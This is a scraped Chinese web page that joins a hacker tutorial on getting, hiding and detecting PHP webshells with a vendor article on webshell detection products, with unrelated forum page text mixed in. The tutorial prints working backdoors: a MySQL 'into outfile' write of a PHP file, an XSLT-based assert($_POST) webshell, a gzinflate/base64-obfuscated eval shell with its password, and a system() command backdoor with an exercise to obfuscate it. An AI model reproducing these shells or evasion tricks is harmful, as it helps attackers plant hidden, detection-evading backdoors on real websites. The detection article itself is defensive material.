【图文】网站后门之WebShell技术分享_百度文库
两大类热门资源免费畅读
续费一年阅读会员，立省24元！
网站后门之WebShell技术分享
大小：1.58MB
登录百度文库，专享文档复制特权，财富值每天免费拿！
你可能喜欢2016年2月 总版技术专家分月排行榜第二2014年2月 总版技术专家分月排行榜第二2013年4月 总版技术专家分月排行榜第二
2016年10月优秀小版主
2016年8月优秀小版主2016年7月优秀小版主优秀小版主2015年7月优秀小版主2015年9月优秀小版主2015年5月优秀小版主2014年11月论坛优秀版主
匿名用户不能发表回复！|
每天回帖即可获得10分可用分！小技巧：
你还可以输入10000个字符
(Ctrl+Enter)
请遵守CSDN，不得违反国家法律法规。
转载文章请注明出自“CSDN（www.csdn.net）”。如是商业用途请联系原作者。前言WebShell就是以asp、php、jsp或者cgi等网页文件形式存在的一种命令执行环境，也可以将其称做为一种网页后门。本篇文章将带大家学习如何获取WebShell，如何隐藏WebShell，有攻必有防，最后带大家学习查杀WebShell。
第一节 CMS获取WebShell
第二节 非CMS获取WebShell
第三节 基于xslt转换的WebShell
第四节 代码混淆隐藏WebShell
第五节 防御篇-查杀WebShell
第一节 CMS获取WebShell
1.1、什么是CMS？CMS是Content Management System的缩写，意为"内容管理系统"。 内容管理系统是企业信息化建设和电子政务的新宠，也是一个相对较新的市场。对于内容管理，业界还没有一个统一的定义，不同的机构有不同的理解。
1.2、常见的CMS有哪些？
asp平台：动易CMS、创力CMS、科汛CMS、新云CMS；
php平台：phpcms、织梦CMS、帝国CMS、php168 CMS；
ASP.NET平台：Zoomla!逐浪CMS、动易CMS、风讯CMS、We7 CMS；
1.3、CMS获取WebShell方法公开漏洞途径：以PHPCMS为例：我们可以利用搜索引擎来查找互联网上公开的通用漏洞，如果目标站点并没有进行修复，即可轻松获取WebShell。
代码审计途径：有很多CMS其实是开源的，我们可以在官网下载到源码，然后进行代码审计，自己挖掘漏洞， 来获取WebShell。关于代码审计的教程篇幅太长，这里就不做更多介绍，我会单独写一篇系列文章进行讲解。
第二节 非CMS获取WebShell
2.1、上传漏洞获取WebShell文件上传漏洞主要有以下几种情况：
MIME类型绕过漏洞
文件扩展名绕过漏洞
文件内容检测绕过类上传漏洞
空字节截断目录路径检测绕过类上传漏洞&&
解析导致的文件上传漏洞：
IIS6.0站上的目录路径检测解析绕过上传漏洞
Apache站上的解析缺陷绕过上传漏洞
htaccess文件上传解析漏洞&&
还有一些编辑器存在漏洞导致的文件上传，比如FCK编辑器。具体请看i春秋学院视频，还可以做实验，链接如下：2.2、SQL注入获取WebShell利用SQL注入攻击获取WebShell其实就是在向服务器写文件。（注意：这里我们需要得到网站的绝对路径）所有常用的关系数据库管理系统（RDBMS）均包含内置的向服务器文件系统写文件的功能。MySQL：
select into outfile(dumpfile)
//MySQL写文件命令
select "&?php echo 'test'; ?&" into outfile "F:\\www\\test.php";
那么其它关系数据库管理系统同样的原理写文件，就不在过多介绍了。2.3、数据库备份获取WebShell利用数据库备份获取WebShell，恰好i春秋有相关的实验，我也发过相关的教程，这里就不介绍了，大家去看看吧，第三步就是利用数据库备份拿WebShell。配套实验地址：（进去后选择越权访问点击START就行了）
第三节&基于xslt转换的WebShell
3.1、什么是xslt？在了解什么是xslt之前，我们需要先了解什么是xsl，XSL是可扩展样式表语言的外语缩写，是一种用于以可读格式呈现 XML（标准通用标记语言的子集）数据的语言。XSL - 不仅仅是样式表语言XSL 包括三部分：XSLT - 一种用于转换 XML 文档的语言。XPath - 一种用于在 XML 文档中导航的语言。XSL-FO - 一种用于格式化 XML 文档的语言。那么看到这里相信大家已经了解到xslt是xsl的一部分。3.2、在PHP下基于xslt转换来隐藏WebShell怎么在php下使用xsl呢？我教大家的都是可以自己学习的方法，既然要使用php，我们肯定要去看php的官方手册，我们去搜索xsl
定位到XSLTProcessor类，可以发现registerPHPFunctions方法，如果你根本不懂这些方法，不要紧，看后面的英文介绍，如果你说你不懂英文，不要紧啊，不有google翻译，拿去翻译一下
Enables the ability to use PHP functions as XSLT functions
我们点进去，可以发现里面有事例，很简单，建议大家去看看啊。PHP手册地址见下面的参考资料我们先来看看官方事例：
&?xml version="1.0" encoding="UTF-8"?&
&xsl:stylesheet version="1.0"
&&&&&xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
&&&&&xmlns:php="http://php.net/xsl"&&&&&&&&&& //这个命名空间URI表示php专用的xsl函数支持
&xsl:output method="html" encoding="utf-8" indent="yes"/&
&&xsl:template match="allusers"&
&&&html&&body&
&&&&&h2&Users&/h2&
&&&&&table&
&&&&&xsl:for-each select="user"&
&&&&&&&tr&&td&
&&&&&&&&&xsl:value-of
&&&&&&&&&&&&&select="php:function('ucfirst',string(uid))"/&&&&& //php:function('assert',string(.))表示将匹配节点的文本作为参数传递给php的assert函数。
&&&&&&&/td&&/tr&
&&&&&/xsl:for-each&
&&&&&/table&
&&&/body&&/html&
&&/xsl:template&
&/xsl:stylesheet&
那么搞懂了以上这些知识，那就很简单了。为了避免xml的转义问题，进行一次assert嵌套，最终WebShell如下：
$xml='&ichunqiu&assert($_POST[zusheng]);&/ichunqiu&';
$xsl='&?xml version="1.0" encoding="UTF-8"?&
&xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:icq="http://php.net/xsl"&
&&xsl:template match="/ichunqiu"&
&&&&&xsl:value-of select="icq:function(\'assert\',string(.))"/&
&&/xsl:template&
&/xsl:stylesheet&';
$xmldoc = DOMDocument::loadXML($xml);
$xsldoc = DOMDocument::loadXML($xsl);
$proc = new XSLTProcessor();
$proc-&registerPHPFunctions();
$proc-&importStyleSheet($xsldoc);
$proc-&transformToXML($xmldoc);
可以直接用菜刀连接：（密码：zusheng）
参考资料：
PHP官方手册：
第四节 代码混淆隐藏WebShell
代码混淆隐藏WebShell也就是通过编码和压缩恶意代码的方式来隐藏WebShell。这里我们使用gzinflate+Base64加密，来隐藏WebShell。
eval(gzinflate(base64_decode('Sy1LzNFQiQ/wDw6JVq8qLc5IzUtXj9W0BgA=')));
可以直接用菜刀连接：（密码：zusheng）
第五节 防御篇-查杀WebShell
5.1、WebShell的分类
5.2、安全工具D盾：
下载地址：
360主机卫士：提供在线监测，把网站打包成zip上传就行了/backdoor小实验学完上述知识，大家是不是想动手来试试了呢，来个小实验。我们先新建一个php文件文件内容如下：
if (isset($_GET["cmd"]))
array_diff_ukey(@array($_GET['cmd']=&1),@array('user'=&2),'system');
使用gzinflate+Base64加密，来隐藏WebShell。使之能正常运行。结束语作为一名黑客，在你取得成功的问题上没有什么诀窍可寻，只有你越努力工作，你才能越接近成功。
文章首链：
感谢您的阅读，如果您学到了，请点赞（码字不易）！
欢迎热心园友补充！
阅读(...) 评论()Webshell 隐藏在网站之下的潘多拉魔盒
　作者: 厂商投稿　编辑:
　　【IT168&资讯】近年来网站被植入后门等隐蔽性攻击呈逐年增长态势，国家互联网应急响应中心发布的《2015年中国互联网报告》中指出，“2015年CNCERT/CC共监测到境内75028个网站被植入后门，其中政府网站有3514个。”　　而Webshell则是最常用的一种网站后门工具，盛邦安全通过大量对被黑网站的应急发现，绝大多数黑客是通过后门进行的修改，并在篡改后删除后门及日志。但与Webshell的危害程度相反的是，许多信息中心并没有非常重视该问题，或者可以说，业界并没有提供很好的解决办法。本文将根据盛邦安全对于Webshell的一些研究做些总结，希望给大家一些借鉴意义。　　你知道或者不知道的Webshell　　对于Webshell在这里我会简单介绍一下，更详细的内容大家可以百度或者查看公众号‘唯品会应急响应中心’之前发布的一篇《Webshell技术总结》的文章，其中有很全面的介绍。　　1、什么是Webshell　　“Web”的含义是需要开放web服务，“shell”的含义是取得对服务器某种程度上的操作权限,常常被称为匿名用户(入侵者)通过网站端口对网站服务器的某种程度的操作权限。类似于个人电脑的cmd模式。　　2、Webshell的分类　　3、Webshell的用途　　· 你发现并利用了一个网站的漏洞　　· 得到了Web权限但没有系统权限　　· 希望下一次能够优雅地连接系统　　如果你通过漏洞成功的在网站中植入了Webshell，那么一个“魔盒”就成功的存在于网站之下，而开启它的“钥匙”就掌握在你的手中。你可以通过它，获取服务器系统权限、控制“肉鸡”发起DDos攻击、篡改网站、网页挂马、作为用于隐藏自己的代理服务器、内部扫描、植入暗链/黑链等等。　　盛邦安全对于检测Webshell的一些建议　　处置一:人工处置　　1、定期检查服务器上是否存在不认识文件;　　虽然大马通常有.asp、.jsp、.php等多种形式，但其通常都是要植入到网站的文件目录下。理论上只要确保目录中不存在未知文件即可防范大马。　　缺点：显而易见，对于自己编辑的简单网站检查起来比较可行，但多数情况下，此类方法费事费力，很难实现。　　2、安装网页防篡改软件(非模式)　　网页防篡改解决Webshell问题的原理与人工检查类似，都是尽可能确保网站目录下不会被随意修改。　　处置二：基于文件的Webshell分析　　●检测是否包含Webshell特征，例如常用的各种函数。　　●检测是否加密(混淆处理)来判断是否为Webshell　　●文件hash检测，创建Webshell样本hashing库，进行对比分析可疑文件。　　●对文件的创建时间、修改时间、文件权限等进行检测，以确认是否为Webshell　　●沙箱技术，根据动态语言沙箱运行时的行为特征进行判断　　处置三：基于流量的检测方式　　●基于payload的行为分析，不仅对已知Webshell进行检测，还能识别出未知的、伪装性强的Webshell。　　●对Webshell的访问特征(IP/UA/Cookie)、payload特征、path特征、时间特征等进行关联分析，以时间为索引，还原攻击事件。　　●便于部署，只需要镜像流量进行分析。　　处置三与处置四的核心之一均是特征库的大小及更新频度，无论是文件特征还是Webshell的传输特征。　　处置四：基于日志的Webshell分析　　分析日志的手段往往用于被攻击后的溯源阶段，最主要的原因就是WEB日志过多，分析起来非常繁琐。而且有些黑客会在攻击后删除日志，这样就只能借助外置的审计类设备进行溯源。　　烽火台的Webshell检测　　WebRAY烽火台监控预警与态势感知平台在设计之初就将Webshell的检测作为核心能力，结合盛邦安全在Web领域的研究，深度集成Webshell检测引擎。该引擎主要利用基于文件以及基于流量两种检测技术。并通过下图所示的威胁情报自研系统，建立情报及行为分析模型库，以此为核心来保障Webshell检测的全面性及准确性。▲盛邦安全对Webshell的研究　　1、基于文件特征的检测：　　通过收集常用的Webshell工具，对其进行分析，提取相应文件特征。然后基于这些特征进行检测。同时还包括处置三中的几种检测方式：是否加密、文件的创建时间、修改时间、文件权限等。同时对于灰色文件启用沙箱检测。▲常用Webshell工具　　烽火台对于基于文件特征的Webshell检测提供两种模式：本地查杀、远程扫描查杀。本地查杀需要在服务器上安装插件进行检测;对于不便于安装插件的客户，烽火台提供远程扫描检测，为实现更好的效果对爬虫进行了改进：爬虫要能识别、积累各种WebShell的特征，并作为爬取必须项;同时具备登录扫描功能，使扫描结果更全面。▲烽火台Webshell检测界面▲基于文件特征的检测结果1▲基于文件特征的检测结果2　　2、基于流量的检测　　烽火台可部署在网络出口处，通过流量镜像分析是否存在Webshell的传输特征。其核心是对于Webshell发起恶意行为的分析及建模能力，更新周期为每月更新。▲行为特征收集▲基于流量的Webshell检测结果　　从安全的演变阶段划分，无论是用上传型小马带大马还是比较流行的直接在cms中植入Webshell等植入形式，都是因为事前存在漏洞。在烽火台系列文章中，也多次提及了漏洞的危害性，而这方面更应该审视的是漏洞检测的全面性，应包括系统漏洞、Web漏洞、中间件漏洞、数据库漏洞，从而保证不存在短板。而Webshell、篡改等问题的监测及检测均属于感知与侦测范畴。在态势感知中，及时性、准确性则是主要的考量标准，而基于威胁情报的检测能大大提高了感知的能力，对于解决隐蔽性、高级的新型威胁有更好帮助。
IT168企业级}